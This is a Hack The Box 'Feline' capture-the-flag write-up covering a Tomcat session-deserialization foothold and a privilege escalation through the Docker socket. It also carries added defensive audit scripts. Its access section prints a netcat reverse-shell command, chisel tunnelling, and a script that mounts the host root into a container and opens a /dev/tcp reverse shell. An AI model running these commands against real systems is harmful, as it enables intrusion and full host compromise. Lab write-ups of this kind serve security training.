Hack The Box — Feline

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

  1. The PersistentManager is enabled and it’s using a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack

2. Scanning

  1. Does the application expose an upload function?
  2. Is the PersistentManager enabled?
  3. Do we know the path of the uploaded file on the server?
  4. Do we know the upload directory?
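The first precondition in the information-gathering list (a PersistentManager backed by a FileStore) and the second scanning question (is the PersistentManager enabled?) are both answered by the Manager/Store elements Tomcat documents for context.xml. The following Python audit is an added example, not code from the original write-up: it parses a context.xml, reports whether that combination is configured and where sessions are stored, and checks whether the Manager's documented sessionAttributeValueClassNameFilter attribute restricts which classes may be deserialized from stored sessions. Both XML documents are constructed samples; the risk labels are this example's own grading.

```python
"""Audit a Tomcat context.xml for a FileStore-backed PersistentManager.

Added example (not from the original write-up). The Manager/Store elements and
the sessionAttributeValueClassNameFilter attribute are the ones Tomcat documents
for context.xml; the two XML samples below are constructed for the demonstration.
"""
import xml.etree.ElementTree as ET

PERSISTENT_MANAGER = "org.apache.catalina.session.PersistentManager"
FILE_STORE = "org.apache.catalina.session.FileStore"

# Constructed sample: the configuration the write-up's checklist looks for,
# with no restriction on which classes session files may deserialize.
SAMPLE_CONTEXT_XML = """
<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" directory="/opt/tomcat/sessions"/>
  </Manager>
</Context>
"""

# Constructed sample: same store, but the Manager allow-lists the attribute
# value classes it will deserialize (a regular expression, per the Tomcat docs).
HARDENED_CONTEXT_XML = """
<Context>
  <Manager className="org.apache.catalina.session.PersistentManager"
           sessionAttributeValueClassNameFilter="java\\.lang\\.(?:Boolean|Integer|Long|Number|String)">
    <Store className="org.apache.catalina.session.FileStore" directory="/opt/tomcat/sessions"/>
  </Manager>
</Context>
"""


def audit_context(xml_text: str) -> dict:
    """Return the findings a defender wants from one context.xml."""
    root = ET.fromstring(xml_text)
    result = {
        "persistent_manager": False,
        "file_store": False,
        "store_directory": None,
        "class_name_filter": None,
        "risk": "low",
    }
    manager = root.find("Manager")  # Manager is a direct child of Context
    if manager is None:
        return result
    result["persistent_manager"] = manager.get("className") == PERSISTENT_MANAGER
    result["class_name_filter"] = manager.get("sessionAttributeValueClassNameFilter")
    store = manager.find("Store")
    if store is not None and store.get("className") == FILE_STORE:
        result["file_store"] = True
        result["store_directory"] = store.get("directory")
    if result["persistent_manager"] and result["file_store"]:
        # Precondition 1 of the checklist is met. Whether a planted session file
        # can reach a deserialization gadget then depends on the class filter.
        result["risk"] = "high" if not result["class_name_filter"] else "medium"
    return result


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_CONTEXT_XML), ("hardened", HARDENED_CONTEXT_XML)):
        print(label, audit_context(doc))
```

Run it against a real deployment by reading conf/context.xml (and any per-application META-INF/context.xml) into audit_context; a "high" result means the store directory is worth comparing against the upload directory from the scanning checklist.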

3. Gaining Access

4. Maintaining Access

python3 exploit.py --master 192.168.115.130 --exec "nc xx.xx.xx.xx xxxx -e /bin/sh"
Local machine:
./chisel server -p 80 --reverse
Vulnerable machine:
./chisel client 10.10.xx.xx:80 R:4506:127.0.0.1:4506
Vulnerable machine:
#!/bin/bash
# Command the container will run with the host filesystem bind-mounted at /mnt
pay="bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/8888 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
# Create the container through the Docker socket
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
# Start it and read back its output
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"
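The script above creates a container whose Binds entry maps the host root into the container read-write, which is what turns socket access into host access. The Python check below is an added example, not code from the write-up: it walks container records in the shape of docker inspect output and flags bind mounts of the host root, the Docker socket, or other sensitive host directories, so a defender can spot this pattern across a host. The container records are constructed samples, and the severity labels are this example's own.

```python
"""Flag containers whose bind mounts expose the host filesystem.

Added example (not from the original write-up). Input is a JSON list of
container records in the shape of `docker inspect` output; only the fields
used here (Name, Id, HostConfig.Binds) need to be present. The records below
are constructed samples.
"""
import json

# Host paths that should never be bind-mounted into an untrusted container.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")

# Constructed sample records (Ids are placeholders, not real container ids).
SAMPLE_INSPECT_JSON = json.dumps([
    {"Id": "c0ffee00", "Name": "/sandbox-escape", "Config": {"Image": "sandbox"},
     "HostConfig": {"Binds": ["/:/mnt:rw"]}},
    {"Id": "deadbeef", "Name": "/web", "Config": {"Image": "nginx"},
     "HostConfig": {"Binds": ["webdata:/usr/share/nginx/html:ro", "/srv/app/config:/config:ro"]}},
    {"Id": "feedface", "Name": "/agent", "Config": {"Image": "monitor"},
     "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
])


def parse_bind(bind: str):
    """Split 'host:container[:mode]' into (host_path, container_path, mode)."""
    parts = bind.split(":")
    host, target = parts[0], parts[1]
    mode = parts[2] if len(parts) > 2 else "rw"  # Docker's default is read-write
    return host, target, mode


def is_sensitive(host_path: str) -> bool:
    """True when the source is the host root or lies under a sensitive path."""
    if not host_path.startswith("/"):
        return False  # a named volume, not a host directory
    norm = host_path.rstrip("/") or "/"
    if norm == "/":
        return True
    for path in SENSITIVE_HOST_PATHS:
        if path == "/":
            continue
        if norm == path or norm.startswith(path + "/"):
            return True
    return False


def audit_containers(inspect_json: str) -> list:
    """Return one finding per sensitive bind mount, in input order."""
    findings = []
    for container in json.loads(inspect_json):
        binds = (container.get("HostConfig") or {}).get("Binds") or []
        for bind in binds:
            host, target, mode = parse_bind(bind)
            if not is_sensitive(host):
                continue
            writable_root = host == "/" and "rw" in mode
            findings.append({
                "container": container.get("Name", container.get("Id")),
                "host_path": host,
                "container_path": target,
                "mode": mode,
                "severity": "critical" if writable_root else "high",
            })
    return findings


if __name__ == "__main__":
    for finding in audit_containers(SAMPLE_INSPECT_JSON):
        print(finding)
```

On a live host, feed it the output of `docker inspect $(docker ps -aq)`; the same check belongs in whatever reviews the create requests arriving at the Docker socket, since the write-up's script never needs a running container to exist beforehand.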

Offensive Security Enthusiast — twitter @eslam3kll
Eslam Akl